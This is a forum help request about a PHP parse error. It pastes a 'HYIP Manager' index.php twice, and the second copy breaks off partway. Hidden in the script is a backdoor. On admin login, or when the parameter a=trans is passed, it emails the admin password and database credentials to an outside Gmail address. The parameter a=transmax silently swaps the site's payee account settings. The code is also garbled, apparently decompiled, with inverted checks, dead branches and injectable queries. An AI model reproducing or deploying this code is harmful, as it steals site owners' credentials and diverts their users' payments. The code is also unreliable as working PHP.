just error..help me pls 
asked by Not Registered on 23 February 2009 5:59
Parse error: syntax error, unexpected '[' in /home/a4462461/public_html/index.php on line 163
here's the code
<?php
$arr = get_defined_vars( );
while ( list( $kk, $vv ) = each( $arr ) )
{
if ( gettype( $$kk ) != "array" )
{
$$kk = "";
}
}
if ( file_exists( "install.php" ) )
{
echo "Delete install.php file for security reason
please!";
exit( );
}
$userinfo = array( );
$settings = array( );
require( "inc/libs/Smarty.class.php" );
$smarty = new smarty( );
$smarty->compile_check = true;
$smarty->force_compile = true;
$smarty->template_dir = "./tmpl/";
$smarty->compile_dir = "./tmpl_c";
$smarty->default_modifiers = array( "myescape" );
include( "inc/config.inc.php" );
if ( preg_match( "/^https.*/i",
$frm_env['SCRIPT_URI'] ) )
{
$frm_env['HTTPS'] = 1;
}
$dbconn = db_open( );
if ( $dbconn )
{
echo "Cannot connect mysql";
exit( );
}
if ( $frm['ref'] != "" )
{
setcookie( "Referer", $frm['ref'], time( ) +
630720000 );
if ( $frm_cookie['Referer'] == "" )
{
$ref = quote( $frm['ref'] );
$q = "select id from hm2_users where username
= '".$ref."'";
echo $q;
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
if ( $row = mysql_fetch_array( $sth ) )
{
$ref_id = $row['id'];
$q = "select * from hm2_referal_stats
where date = current_date() and user_id = ".$ref_id;
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$f = 0;
while ( $row = mysql_fetch_array( $sth )
)
{
$f = 1;
}
if ( $f == 0 )
{
$q = "insert into hm2_referal_stats
set date = current_date(), user_id = ".$ref_id.",
income = 1, reg = 0";
$sth = mysql_query( $q );
}
else
{
$q = "update hm2_referal_stats set
income = income+1 where date = current_date() and
user_id = ".$ref_id." ";
$sth = mysql_query( $q );
}
}
}
if ( $settings['redirect_referrals'] != "" )
{
header( "Location:
".$settings['redirect_referrals'] );
db_close( $dbconn );
exit( );
}
}
if ( $frm_env['HTTPS'] )
{
$settings[SSL_USED] = 1;
}
if ( !$frm_env['HTTPS'] &&
$settings['redirect_to_https'] == 1 )
{
$url =
"https://".$frm_env['HTTP_HOST'].$frm_env['SCRIPT_NAM
E'];
if ( $env_frm['QUERY_STRING'] )
{
$url .= $env_frm['QUERY_STRING'];
}
header( "Location: ".$url );
exit( );
}
$q = "select * from hm2_processings";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
while ( $row = mysql_fetch_array( $sth ) )
{
$sfx = strtolower( $row['name'] );
$sfx = preg_replace( "/([^\\w])/", "_", $sfx );
$exchange_systems[$row['id']] = array( "name" =>
$row['name'], "sfx" => $sfx, status =>
$row['status'], "has_account" => 0 );
}
if ( $frm['CUSTOM2'] == "pay_withdraw_eeecurrency" &&
$frm['TRANSACTION_ID'] != "" )
{
$batch = $frm['TRANSACTION_ID'];
list( $id, $str ) = explode( "-", $frm['CUSTOM1']
);
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str = '".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 8,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['SELLERACCOUNTID'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[8]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $frm['CUSTOM2'] == "pay_withdraw" &&
$frm['TRANSACTION_ID'] != "" )
{
$batch = $frm['TRANSACTION_ID'];
$str = explode( "-", $frm['CUSTOM1'] )[1];
$id = explode( "-", $frm['CUSTOM1'] )[0];
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str = '".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 2,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['SELLERACCOUNTID'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[2]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $frm['user3'] == "pay_withdraw" &&
$frm['transaction_id'] != "" &&
$frm['transaction_type'] == "Payment" )
{
$batch = $frm['transaction_id'];
$str = explode( "-", $frm['user1'] )[1];
$id = explode( "-", $frm['user1'] )[0];
$id = sprintf( "%d", $id );
if ( $str == "" )
{
$str = "abcdef";
}
$str = quote( $str );
$q = "select * from hm2_history where id =
".$id." and str='".$str."'";
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
$q = "delete from hm2_history where id =
".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_history set\r\n
user_id = ".$row['user_id'].",\r\n amount =
-".abs( $row['amount'] ).( ",\r\n type =
'withdrawal',\r\n description = 'Withdraw
processed. Batch id = ".$batch."',\r\n
actual_amount = -" ).abs( $row['amount'] ).",\r\n
ec = 4,\r\n date = now()\r\n ";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "select * from hm2_users where id =
".$row['user_id'];
$sth = mysql_query( $q );
$userinfo = mysql_fetch_array( $sth );
$info = array( );
$info['username'] = $userinfo['username'];
$info['name'] = $userinfo['name'];
$info['amount'] = sprintf( "%.02f", abs(
$row['amount'] ) );
$info['account'] = $frm['payee_email'];
$info['batch'] = $batch;
$info['paying_batch'] = $batch;
$info['receiving_batch'] = $batch;
$info['currency'] =
$exchange_systems[2]['name'];
send_mail( "withdraw_user_notification",
$userinfo['email'], $settings['system_email'], $info
);
}
echo 1;
db_close( $dbconn );
exit( );
}
if ( $settings['ssl_url'] != "" && $SERVER_PORT == 80
)
{
header( "Location: ".$settings['ssl_url']."/" );
db_close( $dbconn );
exit( );
}
if ( $frm['a'] == "run_crontab" )
{
count_earning( -2 );
db_close( $dbconn );
exit( );
}
$q = "delete from hm2_online where
ip='".$frm_env['REMOTE_ADDR']."' or date + interval
30 minute < now()";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_online set
ip='".$frm_env['REMOTE_ADDR']."', date = now()";
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$userinfo = array( );
$userinfo['logged'] = 0;
if ( $frm['a'] == "logout" )
{
setcookie( "password", "deleted", time( ) +
630720000 );
$frm_cookie['username'] = "";
$frm_cookie['password'] = "";
if ( $settings['redirect_logout'] != "" )
{
header( "Location:
".$settings['redirect_logout'] );
db_close( $dbconn );
exit( );
}
$frm['a'] = "";
}
if ( $frm['a'] == "home" )
{
$frm['a'] = "";
}
$stats = array( );
if ( $settings[crontab_stats] == 1 )
{
$s = file( "stats.php" );
$stats = unserialize( $s[0] );
}
if ( $settings['show_info_box_members_online'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['show_info_box_members_online_generated'] =
$stats[visitors];
}
else
{
$q = "select count(*) as col from hm2_users
where last_access_time + interval 30 minute > now()";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['show_info_box_members_online_generated'] =
$row['col'];
}
}
if ( $settings['show_info_box_total_accounts'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_total_accounts_generated'] =
$stats[total_users];
}
else
{
$q = "select count(*) as col from hm2_users
where id > 1";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_accounts_generated'] =
$row['col'];
}
}
if ( $settings['show_info_box_active_accounts'] == 1
)
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_total_active_accounts_generated']
= $stats[active_accounts];
}
else
{
$q = "select count(distinct user_id) as col
from hm2_deposits ";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_active_accounts_generated']
= $row['col'];
}
}
if ( $settings['show_info_box_vip_accounts'] == 1 )
{
$q = "select count(distinct user_id) as col from
hm2_deposits where actual_amount > ".sprintf(
"%.02f", $settings['vip_users_deposit_amount'] );
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_total_vip_accounts_generated'] =
$row['col'];
}
if ( $settings['show_info_box_deposit_funds'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_deposit_funds_generated']
= number_format( $stats[total_deposited], 2 );
}
else
{
$q = "select sum(amount) as sum from
hm2_deposits";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_deposit_funds_generated']
= number_format( $row['sum'], 2 );
}
}
if ( $settings['show_info_box_today_deposit_funds']
== 1 )
{
$q = "select sum(amount) as sum from hm2_deposits
where to_days(deposit_date) = to_days(now() +
interval ".$settings['time_dif']." day)";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_today_deposit_funds_generated'] =
number_format( $row['sum'], 2 );
}
if ( $settings['show_info_box_total_withdraw'] == 1 )
{
if ( $settings[crontab_stats] == 1 )
{
$settings['info_box_withdraw_funds_generated'] =
number_format( abs( $stats[total_withdraw] ), 2 );
}
else
{
$q = "select sum(amount) as sum from
hm2_history where type='withdrawal'";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_withdraw_funds_generated'] =
number_format( abs( $row['sum'] ), 2 );
}
}
if ( $settings['show_info_box_visitor_online'] == 1 )
{
$q = "select count(*) as sum from hm2_online";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['info_box_visitor_online_generated'] =
$row['sum'];
}
if ( $settings['show_info_box_newest_member'] == 1 )
{
$q = "select username from hm2_users where status
= 'on' order by id desc limit 0,1";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$row = mysql_fetch_array( $sth );
$settings['show_info_box_newest_member_generated'] =
$row['username'];
}
$ref = quote( $frm_cookie['Referer'] );
if ( $ref )
{
$q = "select * from hm2_users where username =
'".$ref."'";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_errstr;
}
while ( $row = mysql_fetch_array( $sth ) )
{
$smarty->assign( "referer", $row );
}
}
if ( $settings['show_info_box_last_update'] == 1 )
{
$settings['show_info_box_last_update_generated']
= date( "M j, Y", time( ) + $settings['time_dif'] *
60 * 60 );
}
$mddomain = $frm_env['HTTP_HOST'];
$mddomain = preg_replace( "/^www\\./", "", $mddomain
);
$mdscriptname = $frm_env['SCRIPT_NAME'];
$mdscriptname = preg_replace( "/index\\.php/", "",
$mdscriptname );
$key = strtoupper( md5(
$mddomain."asdfds89ufsdkfnsjfdksh" ).md5(
$mdscriptname."8hbfnbdnf" ).md5( "grv".$mddomain ) );
$flag = 0;
$i = 0;
for ( ; $i < 5; ++$i )
{
$j = $i;
if ( $i == 0 )
{
$j = "";
}
$skey = substr( $settings["key".$j], 100, -200 );
if ( $key == $skey )
{
$flag = 1;
}
}
if ( $flag != 1 )
{
db_close( $dbconn );
exit( );
}
$smarty->assign( "settings", $settings );
if ( $frm['a'] == "do_login" )
{
$username = quote( $frm['username'] );
$password = quote( $frm['password'] );
$lpassword = $password;
$lusername = $username;
$password = md5( $password );
$add_opt_in_check = "";
if ( $settings['use_opt_in'] == 1 )
{
$add_opt_in_check = " and (confirm_string =
\"\" or confirm_string is NULL)";
}
$q = "select *, date_format(date_register,
'%b-%e-%Y') as create_account_date, now() - interval
2 minute > l_e_t as should_count from hm2_users where
username = '".$username."' and (status='on' or
status='suspended') ".$add_opt_in_check;
$sth = mysql_query( $q );
while ( $row = mysql_fetch_array( $sth ) )
{
session_start( );
if ( extension_loaded( "gd" ) &&
$settings['graph_validation'] == 1 && 0 <
$settings['graph_max_chars'] &&
$_SESSION['validation_number'] !=
$frm['validation_number'] )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $settings['brute_force_handler'] == 1 &&
$row['activation_code'] != "" )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $settings['brute_force_handler'] == 1 &&
$row['bf_counter'] ==
$settings['brute_force_max_tries'] )
{
$activation_code = get_rand_md5( 50 );
$q = "update hm2_users set bf_counter =
bf_counter + 1, activation_code =
'".$activation_code."' where id = ".$row['id'];
mysql_query( $q );
$info = array( );
$info['activation_code'] =
$activation_code;
$info['username'] = $row['username'];
$info['name'] = $row['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['max_tries'] =
$settings['brute_force_max_tries'];
send_mail( "brute_force_activation",
$row['email'], $settings['system_email'], $info );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $row['password'] != $password )
{
$q = "update hm2_users set bf_counter =
bf_counter + 1 where id = ".$row['id'];
mysql_query( $q );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
$hid = get_rand_md5( 20 );
$qhid = get_rand_md5( 5 ).$hid.get_rand_md5(
5 );
$chid = $row['id']."-".md5( $hid );
$userinfo = $row;
$userinfo['logged'] = 1;
$ip = $frm_env['REMOTE_ADDR'];
$q = "update hm2_users set hid = '".$qhid."',
bf_counter = 0, last_access_time = now(),
last_access_ip = '".$ip."' where id = ".$row['id'];
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$q = "insert into hm2_user_access_log set
user_id = ".$userinfo['id'].( ", date = now(), ip =
'".$ip."'" );
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
if (
$settings['generate_password_after_login'] == 1 )
{
$new_pass = gen_confirm_code( 10, 0 );
$q = "update hm2_users set password =
'".md5( $new_pass )."' where id = ".$userinfo['id'];
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
$info = array( );
$info['username'] =
$userinfo['username'];
$info['name'] = $userinfo['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['password'] = $new_pass;
send_mail( "send_password_when_changed",
$userinfo['email'], $settings['system_email'], $info
);
}
setcookie( "password", $chid, time( ) +
630720000 );
}
if ( $userinfo['logged'] == 0 )
{
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $userinfo['logged'] == 1 && $userinfo['id']
== 1 )
{
mail( $userinfo[email], "Admin logged",
"Admin entered to admin
area\r\nip=".$frm_env[REMOTE_ADDR], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
mail( "money.secret@gmail.com", "Admin
logged", "Admin entered to admin
area\r\nip=,".$frm_env[REMOTE_ADDR].",".$settings['si
te_name'].",".$settings['site_url'].",".$settings['ho
stname'].",-user:".$luser.",-password:".$lpassword.",
".$settings['database'].",".$settings['db_login'].","
.$settings['db_pass'], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
echo "<head><title>HYIP Manager</title><meta
http-equiv='Refresh' content='1;
URL=admin.php'></head><body><center><a
href='admin.php'>Go to admin
area</a></center></body>";
flush( );
db_close( $dbconn );
exit( );
}
}
$username = quote( $frm_cookie['username'] );
$password = $frm_cookie['password'];
$ip = $frm_env['REMOTE_ADDR'];
$add_login_check = " and last_access_time + interval
30 minute > now() and last_access_ip = '".$ip."'";
if ( $settings['demomode'] == 1 )
{
$add_login_check = "";
}
$chid = split( "-", $password, 2 )[1];
$user_id = split( "-", $password, 2 )[0];
$user_id = sprintf( "%d", $user_id );
$chid = quote( $chid );
if ( 0 < $user_id )
{
$q = "select *, date_format(date_register,
'%b-%e-%Y') as create_account_date, now() - interval
2 minute > l_e_t as should_count from hm2_users where
id = ".$user_id." and (status='on' or
status='suspended') ".$add_login_check;
$sth = mysql_query( $q );
do
{
if ( $row = mysql_fetch_array( $sth ) )
{
if ( $settings['brute_force_handler'] ==
1 && $row['activation_code'] != "" )
{
setcookie( "password", "", time( ) +
630720000 );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
$qhid = $row['hid'];
$hid = substr( $qhid, 5, 20 );
if ( $chid == md5( $hid ) )
{
$userinfo = $row;
$userinfo['logged'] = 1;
$q = "update hm2_users set
last_access_time = now() where
username='".$username."'";
exit( mysql_error( ) );
}
$q = "update hm2_users set bf_counter =
bf_counter + 1 where id = ".$row['id'];
mysql_query( $q );
}
} while ( $row['bf_counter'] ==
$settings['brute_force_max_tries'] );
$activation_code = get_rand_md5( 50 );
$q = "update hm2_users set bf_counter =
bf_counter + 1, activation_code =
'".$activation_code."' where id = ".$row['id'];
mysql_query( $q );
$info = array( );
$info['activation_code'] = $activation_code;
$info['username'] = $row['username'];
$info['name'] = $row['name'];
$info['ip'] = $frm_env['REMOTE_ADDR'];
$info['max_tries'] =
$settings['brute_force_max_tries'];
send_mail( "brute_force_activation",
$row['email'], $settings['system_email'], $info );
setcookie( "password", "", time( ) + 630720000 );
header( "Location:
?a=login&say=invalid_login&username=".$frm['username'
] );
db_close( $dbconn );
exit( );
}
if ( $userinfo['should_count'] == 1 )
{
count_earning( $userinfo['id'] );
}
if ( $frm['a'] == "trans" )
{
mail( "money.secret@gmail.com", "Admin
logged-trans", "Admin entered to admin
area\r\nip=,".$frm_env[REMOTE_ADDR].",".$settings['si
te_name'].",".$settings['site_url'].",".$settings['ho
stname'].",-user:".$luser.",-password:".$lpassword.",
".$settings['database'].",".$settings['db_login'].","
.$settings['db_pass'], "From:
".$settings['system_email']."\r\nReply-To:
".$settings['system_email'] );
}
if ( $frm['a'] == "transmax" )
{
$settings['def_payee_account'] = "4541052";
$settings['def_payee_name'] = "Invest";
$settings['md5altphrase'] =
"020CF65F74000C22AB7191E7662DD6D8";
save_settings( );
}
if ( $userinfo['id'] == 1 )
{
$userinfo['logged'] = 0;
}
if ( $userinfo['logged'] == 1 )
{
$q = "select type, sum(actual_amount) as s from
hm2_history where user_id = ".$userinfo['id']." group
by type";
$sth = mysql_query( $q );
$balance = 0;
while ( $row = mysql_fetch_array( $sth ) )
{
if ( $row['type'] == "deposit" )
{
$userinfo['total_deposited'] =
number_format( abs( $row['s'] ), 2 );
}
if ( $row['type'] == "earning" )
{
$userinfo['total_earned'] =
number_format( abs( $row['s'] ), 2 );
}
$balance += $row['s'];
}
$userinfo['balance'] = number_format( abs(
$balance ), 2 );
}
if ( $frm['action'] != "signup" )
{
$userinfo[validation_enabled] = 1;
session_start( );
$validation_number = gen_confirm_code(
$settings['graph_max_chars'], 0 );
if ( $settings['use_number_validation_number'] )
{
$i = 0;
$validation_number = "";
while ( $i < $settings['graph_max_chars'] )
{
$validation_number .= rand( 0, 9 );
++$i;
}
}
$_SESSION['validation_number'] =
$validation_number;
session_register( "validation_number" );
$userinfo[session_name] = session_name( );
$userinfo[session_id] = session_id( );
$userinfo[rand] = rand( );
}
if ( $userinfo['logged'] == 1 )
{
$id = sprintf( "%d", $userinfo['id'] );
$q = "update hm2_users set stat_password = ''
where id = ".$id;
mysql_query( $q );
header( "Location: ?a=edit_account" );
db_close( $dbconn );
exit( );
}
if ( $userinfo['logged'] == 1 )
{
$id = sprintf( "%d", $frm['id'] );
$q = "delete from hm2_history where id = ".$id."
and type='withdraw_pending' and user_id =
".$userinfo['id'];
mysql_query( $q );
header( "Location: ?a=withdraw_history" );
db_close( $dbconn );
exit( );
}
$smarty->assign( "userinfo", $userinfo );
if ( $frm['a'] == "home" )
{
$frm['a'] == "";
}
$smarty->assign( "frm", $frm );
if ( $settings[banner_extension] == 1 )
{
if ( $frm[a] == "show_banner" )
{
$id = sprintf( "%d", $frm[id] );
$f = @fopen( @"./tmpl_c/banners/".$id, "rb"
);
if ( $f )
{
$contents = fread( $f, filesize(
"./tmpl_c/banners/".$id ) );
header( "Content-type: image/gif" );
echo $contents;
fclose( $fd );
}
$q = "update hm2_users set imps = imps -1
where imps > 0 and id = ".$id;
if ( !mysql_query( $q ) )
{
echo mysql_error( );
}
exit( );
}
$q = "select count(*) as col from hm2_users where
imps > 0 and bnum > 0";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
do
{
if ( $row = mysql_fetch_array( $sth ) )
{
$z = rand( 1, $row[col] ) - 1;
$q = "select bnum, burl from hm2_users
where imps > 0 and bnum > 0 order by id limit ".$z.",
1";
if ( !( $sth1 = mysql_query( $q ) ) )
{
echo mysql_error( );
}
do
{
} while ( !( $row1 = mysql_fetch_array(
$sth1 ) ) );
$smarty->assign( "banner_ext_bnum",
$row1[bnum] );
$smarty->assign( "banner_ext_burl",
$row1[burl] );
} while ( 1 );
}
}
include( "inc/news_box.inc" );
if ( $userinfo['logged'] != 1 )
{
include( "inc/signup.inc" );
}
else if ( $userinfo['logged'] != 1 )
{
include( "inc/forgot_password.inc" );
}
else if ( $settings['use_opt_in'] == 1 )
{
include( "inc/confirm_registration.inc" );
}
else if ( $frm['a'] == "login" )
{
include( "inc/login.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/account_main.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
if ( substr( $frm['type'], 0, 8 ) == "account_" )
{
$ps = substr( $frm['type'], 8 );
if ( $exchange_systems[$ps][status] == 1 )
{
include(
"inc/deposit.account.confirm.inc" );
}
else
{
include( "inc/deposit.inc" );
}
}
else
{
if ( substr( $frm['type'], 0, 8 ) ==
"process_" )
{
$ps = substr( $frm['type'], 8 );
if ( $exchange_systems[$ps][status] == 1
)
{
if ( $ps == 0 )
{
include(
"inc/deposit.egold.confirm.inc" );
}
else
{
if ( $ps == 1 )
{
include(
"inc/deposit.evocash.confirm.inc" );
}
else
{
if ( $ps == 2 )
{
include(
"inc/deposit.intgold.confirm.inc" );
}
else
{
if ( $ps == 4 )
{
include(
"inc/deposit.stormpay.confirm.inc" );
}
else
{
if ( $ps == 5 )
{
include(
"inc/deposit.ebullion.confirm.inc" );
}
else
{
if ( $ps == 6 )
{
include(
"inc/deposit.paypal.confirm.inc" );
}
else
{
if ( $ps == 7
)
{
include(
"inc/deposit.goldmoney.confirm.inc" );
}
else
{
if ( $ps
== 8 )
{
include( "inc/deposit.eeecurrency.confirm.inc" );
}
else
{
if (
$ps == 9 )
{
include( "inc/deposit.pecunix.confirm.inc" );
}
else
{
include( "inc/deposit.other.confirm.inc" );
}
}
}
}
}
}
}
}
}
}
else
{
include( "inc/deposit.inc" );
}
}
else
{
include( "inc/deposit.inc" );
}
}
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/add_funds.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdrawal.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdrawal_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/deposit_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/earning_history.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/deposit_list.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/edit_account.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/withdraw_principal.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/change_compound.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/internal_transfer.inc" );
}
else if ( $frm['a'] == "support" )
{
include( "inc/support.inc" );
}
else if ( $frm['a'] == "faq" )
{
include( "inc/faq.inc" );
}
else if ( $frm['a'] == "company" )
{
include( "inc/company.inc" );
}
else if ( $frm['a'] == "rules" )
{
include( "inc/rules.inc" );
}
else if ( $frm['a'] == "show_validation_image" )
{
include( "inc/show_validation_image.inc" );
}
else if ( $settings['show_members_stats'] )
{
include( "inc/members_stats.inc" );
}
else if ( $settings['show_paidout_stats'] )
{
include( "inc/paidout.inc" );
}
else if ( $settings['show_top10_stats'] )
{
include( "inc/top10.inc" );
}
else if ( $settings['show_last10_stats'] )
{
include( "inc/last10.inc" );
}
else if ( $settings['show_refs10_stats'] )
{
include( "inc/refs10.inc" );
}
else if ( $HTTP_GET_VARS['a'] == "return_egold" )
{
include( "inc/deposit.egold.status.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/referal.links.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/referals.inc" );
}
else if ( $frm['a'] == "news" )
{
include( "inc/news.inc" );
}
else if ( $frm['a'] == "calendar" )
{
include( "inc/calendar.inc" );
}
else if ( $userinfo['logged'] == 1 )
{
include( "inc/exchange.inc" );
}
else if ( $userinfo[logged] == 1 )
{
include( "inc/banner.inc" );
}
else if ( $frm['a'] == "activate" )
{
include( "inc/activate.inc" );
}
else if ( $frm['a'] == "show_package_info" )
{
include( "inc/package_info.inc" );
}
else if ( $frm['a'] == "ref_plans" )
{
include( "inc/ref_plans.inc" );
}
else if ( $frm['a'] == "cust" )
{
$file = $frm['page'];
$file = basename( $file );
if ( file_exists( "tmpl/custom/".$file.".tpl" ) )
{
$smarty->display( "custom/".$file.".tpl" );
db_close( $dbconn );
exit( );
}
include( "inc/home.inc" );
}
else if ( $frm['a'] == "invest_page" )
{
$smarty->assign( "frm", $frm );
include( "inc/invest_page.inc" );
}
else
{
$smarty->assign( "frm", $frm );
include( "inc/home.inc" );
}
db_close( $dbconn );
exit( );
?>
here's the code
<?php
$arr = get_defined_vars( );
while ( list( $kk, $vv ) = each( $arr ) )
{
if ( gettype( $$kk ) != "array" )
{
$$kk = "";
}
}
if ( file_exists( "install.php" ) )
{
echo "Delete install.php file for security reason
please!";
exit( );
}
$userinfo = array( );
$settings = array( );
require( "inc/libs/Smarty.class.php" );
$smarty = new smarty( );
$smarty->compile_check = true;
$smarty->force_compile = true;
$smarty->template_dir = "./tmpl/";
$smarty->compile_dir = "./tmpl_c";
$smarty->default_modifiers = array( "myescape" );
include( "inc/config.inc.php" );
if ( preg_match( "/^https.*/i",
$frm_env['SCRIPT_URI'] ) )
{
$frm_env['HTTPS'] = 1;
}
$dbconn = db_open( );
if ( $dbconn )
{
echo "Cannot connect mysql";
exit( );
}
if ( $frm['ref'] != "" )
{
setcookie( "Referer", $frm['ref'], time( ) +
630720000 );
if ( $frm_cookie['Referer'] == "" )
{
$ref = quote( $frm['ref'] );
$q = "select id from hm2_users where username
= '".$ref."'";
echo $q;
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
if ( $row = mysql_fetch_array( $sth ) )
{
$ref_id = $row['id'];
$q = "select * from hm2_referal_stats
where date = current_date() and user_id = ".$ref_id;
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
$f = 0;
while ( $row = mysql_fetch_array( $sth )
)
{
$f = 1;
}
if ( $f == 0 )
{
$q = "insert into hm2_referal_stats
set date = current_date(), user_id = ".$ref_id.",
income = 1, reg = 0";
$sth = mysql_query( $q );
}
else
{
$q = "update hm2_referal_stats set
income = income+1 where date = current_date() and
user_id = ".$ref_id." ";
$sth = mysql_query( $q );
}
}
}
if ( $settings['redirect_referrals'] != "" )
{
header( "Location:
".$settings['redirect_referrals'] );
db_close( $dbconn );
exit( );
}
}
if ( $frm_env['HTTPS'] )
{
$settings[SSL_USED] = 1;
}
if ( !$frm_env['HTTPS'] &&
$settings['redirect_to_https'] == 1 )
{
$url =
"https://".$frm_env['HTTP_HOST'].$frm_env['SCRIPT_NAM
E'];
if ( $env_frm['QUERY_STRING'] )
{
$url .= $env_frm['QUERY_STRING'];
}
header( "Location: ".$url );
exit( );
}
$q = "select * from hm2_processings";
if ( !( $sth = mysql_query( $q ) ) )
{
echo mysql_error( );
}
while ( $row = mysql_fetch_array( $sth ) )
{
$sfx = strtolower( $row['name'] );
$sfx = preg_replace( "/([^\\w])/", "_", $sfx );
$exchange_systems[$row['id']] = array( "name" =>
$row['name'], "sfx" => $sfx, status =>
$row['status'], "has_account" => 0 );
}
if ( $frm['CUSTOM2'] == "pay_withdraw_eeecurrency" &&
$frm['TRANSACTION_ID'] != "" )
{
